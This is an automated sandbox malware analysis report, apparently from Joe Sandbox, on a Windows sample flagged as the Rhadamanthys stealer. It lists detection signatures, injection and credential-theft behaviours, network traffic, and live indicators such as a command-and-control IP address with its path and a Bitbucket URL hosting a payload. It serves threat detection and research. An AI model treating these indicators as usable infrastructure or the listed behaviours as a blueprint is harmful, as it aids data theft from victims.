Windows Analysis Report
nF54KOU30R.exe

Overview

General Information

Sample name: nF54KOU30R.exe
(renamed file extension from none to exe, renamed because original name is a hash value)
Original sample name: 75a515dcf017365b0feee7b1be20126df7066ca2fa0a7718009279f50dabc5fc
Analysis ID: 1446953
MD5: ea37157ee7ab8afb57a0f8e09afc8bec
SHA1: adb8dd210e87687ce11781f3003aaadff9698dcc
SHA256: 75a515dcf017365b0feee7b1be20126df7066ca2fa0a7718009279f50dabc5fc
Infos:

Detection

RHADAMANTHYS
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected RHADAMANTHYS Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (STR)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Dllhost Internet Connection
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic

Classification

Name Description Attribution Blogpost URLs Link
Rhadamanthys According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
 https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: nF54KOU30R.exe Avira: detected
Multi AV Scanner detection for submitted file
Source: nF54KOU30R.exe ReversingLabs: Detection: 57%
Source: nF54KOU30R.exe Virustotal: Detection: 60% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: nF54KOU30R.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E574FF7C CryptUnprotectData, 15_3_00007DF4E574FF7C
Uses 32bit PE files
Source: nF54KOU30R.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: nF54KOU30R.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2. source: OpenWith.exe, 0000000F.00000002.2320949887.000001F0D5588000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb$I` source: OpenWith.exe, 0000000F.00000002.2320949887.000001F0D5588000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: OpenWith.exe, 0000000F.00000002.2320949887.000001F0D5588000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb source: dialer.exe, 00000005.00000003.1934515258.0000000004CD0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934457085.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: OpenWith.exe, 0000000F.00000002.2320949887.000001F0D5588000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: dialer.exe, 00000005.00000003.1934634916.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934769024.0000000004DD0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: dialer.exe, 00000005.00000003.1933919289.0000000004DA0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1933537331.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: dialer.exe, 00000005.00000003.1934155632.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934298926.0000000004D50000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: dialer.exe, 00000005.00000003.1933919289.0000000004DA0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1933537331.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: dialer.exe, 00000005.00000003.1934155632.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934298926.0000000004D50000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: win32u.pdb source: wmplayer.exe, wmplayer.exe, 00000010.00000003.2232497816.0000020343550000.00000004.00000001.00020000.00000000.sdmp, wmplayer.exe, 00000010.00000003.2232660082.0000020343580000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdbUGP source: dialer.exe, 00000005.00000003.1934515258.0000000004CD0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934457085.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdbUGP source: dialer.exe, 00000005.00000003.1934634916.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934769024.0000000004DD0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: win32u.pdbGCTL source: wmplayer.exe, 00000010.00000003.2232497816.0000020343550000.00000004.00000001.00020000.00000000.sdmp, wmplayer.exe, 00000010.00000003.2232660082.0000020343580000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5758E20 GetLogicalDriveStringsW, 15_3_00007DF4E5758E20
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\System32\OpenWith.exe Code function: 4x nop then dec esp 15_3_00007DF4E575BFA1
Source: C:\Windows\System32\OpenWith.exe Code function: 4x nop then dec esp 15_2_000001F0D53B0511
Source: C:\Program Files\Windows Media Player\wmplayer.exe Code function: 4x nop then dec esp 16_2_0000020343285641

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2854802 ETPRO TROJAN Suspected Rhadamanthys Related SSL Cert 94.156.67.91:6939 -> 192.168.2.4:49737
Source: Traffic Snort IDS: 2854802 ETPRO TROJAN Suspected Rhadamanthys Related SSL Cert 94.156.67.91:6939 -> 192.168.2.4:49738
Source: Traffic Snort IDS: 2854802 ETPRO TROJAN Suspected Rhadamanthys Related SSL Cert 94.156.67.91:6939 -> 192.168.2.4:49740
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49737 -> 94.156.67.91:6939
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.192.141.1 104.192.141.1
Source: Joe Sandbox View IP Address: 104.192.141.1 104.192.141.1
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TERASYST-ASBG TERASYST-ASBG
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox View JA3 fingerprint: caec7ddf6889590d999d7ca1b76373b6
Source: unknown TCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E57821BC WSARecv, 15_3_00007DF4E57821BC
Source: global traffic HTTP traffic detected: GET /exlices2dsasd/felijsd/raw/97efb5e9acdf5e9946a2959d44a26bcaae894841/DEFSAFAAAAAAAAVCC HTTP/1.1Accept: */*User-Agent: Chrome/95.0.4638.54Host: bitbucket.org
Source: global traffic DNS traffic detected: DNS query: bitbucket.org
Source: dialer.exe, 00000005.00000002.1994131096.000000000259C000.00000004.00000010.00020000.00000000.sdmp, dialer.exe, 00000005.00000002.1998374665.0000000004F50000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000005.00000002.1996018655.0000000004B28000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, OpenWith.exe, 0000000F.00000003.2319739898.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2256043552.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2146388100.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000002.2321330995.000001F0D737C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000002.2321549596.000001F0D7426000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2265610834.000001F0D73C9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2078385188.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000002.2321675274.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2080480545.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2147044132.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2079654830.000001F0D73C6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2081757953.000001F0D745A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2146780180.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2081590039.000001F0D743B000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2075439224.000001F0D743A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2256879858.000001F0D73C9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2075836836.000001F0D743A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://94.156.67.91:6939/063f04131db66c38e7/27isnud6.7mv0n
Source: OpenWith.exe, 0000000F.00000003.2319739898.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2256043552.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2146388100.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2078385188.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000002.2321675274.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2080480545.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2147044132.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2079654830.000001F0D73C6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2081757953.000001F0D745A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2146780180.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2081590039.000001F0D743B000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2075439224.000001F0D743A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2075836836.000001F0D743A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2077245236.000001F0D7444000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2116540453.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2108797615.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2077757038.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2075206262.000001F0D743A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2147260095.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2078142726.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2079158440.000001F0D73C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://94.156.67.91:6939/063f04131db66c38e7/27isnud6.7mv0n:
Source: dialer.exe, 00000005.00000002.1998374665.0000000004F50000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000005.00000002.1996018655.0000000004B28000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000002.2320836461.000001F0D53B0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: https://94.156.67.91:6939/063f04131db66c38e7/27isnud6.7mv0nkernelbasentdllkernel32GetProcessMitigati
Source: OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: nF54KOU30R.exe, 00000000.00000003.1915931292.0000000001013000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000002.1982141598.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000003.1916214760.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aui-cdn.atlassian.com/
Source: nF54KOU30R.exe, 00000000.00000002.1982036347.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/
Source: nF54KOU30R.exe, 00000000.00000002.1982036347.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/0
Source: nF54KOU30R.exe, 00000000.00000002.1982036347.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000002.1982141598.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000003.1916214760.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/exlices2dsasd/felijsd/raw/97efb5e9acdf5e9946a2959d44a26bcaae894841/DEFSAFAAAAA
Source: nF54KOU30R.exe, 00000000.00000003.1915931292.0000000001013000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000002.1982141598.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000003.1916214760.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.cookielaw.org/
Source: OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: nF54KOU30R.exe, 00000000.00000003.1916214760.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://d136azpfpnge1l.cloudfront.net/;
Source: nF54KOU30R.exe, 00000000.00000003.1916214760.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://d301sr5gafysq2.cloudfront.net/
Source: OpenWith.exe, 0000000F.00000003.2080999215.000001F0D7613000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://discord.com
Source: OpenWith.exe, 0000000F.00000003.2080999215.000001F0D7613000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://discordapp.com
Source: OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: nF54KOU30R.exe, 00000000.00000003.1915931292.0000000001013000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000002.1982141598.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000003.1916214760.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: nF54KOU30R.exe, 00000000.00000003.1915931292.0000000001013000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000002.1982141598.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000003.1916214760.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: OpenWith.exe, 0000000F.00000003.2078142726.000001F0D73A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: OpenWith.exe, 0000000F.00000003.2076605269.000001F0D7644000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: OpenWith.exe, 0000000F.00000003.2077419633.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5a
Source: OpenWith.exe, 0000000F.00000003.2078142726.000001F0D73A6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2076758664.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: OpenWith.exe, 0000000F.00000003.2076758664.000001F0D7394000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17A66
Source: OpenWith.exe, 0000000F.00000003.2076605269.000001F0D7644000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: OpenWith.exe, 0000000F.00000002.2321311463.000001F0D737A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2230586542.000001F0D737A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2081434576.000001F0D7371000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2265431962.000001F0D7371000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2107281075.000001F0D7374000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2109142807.000001F0D737A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2116414121.000001F0D737A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2256683034.000001F0D737A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17N-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP
Source: OpenWith.exe, 0000000F.00000003.2076758664.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17t.mc_id=EnterPK201694ba2e0b-6
Source: nF54KOU30R.exe, 00000000.00000003.1915931292.0000000001013000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: nF54KOU30R.exe, 00000000.00000002.1982141598.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000003.1916214760.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website~e
Source: OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49750 version: TLS 1.2
Creates a DirectInput object (often for capturing keystrokes)
Source: dialer.exe, 00000005.00000003.1934634916.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: DirectInput8Create memstr_d5bbd631-1
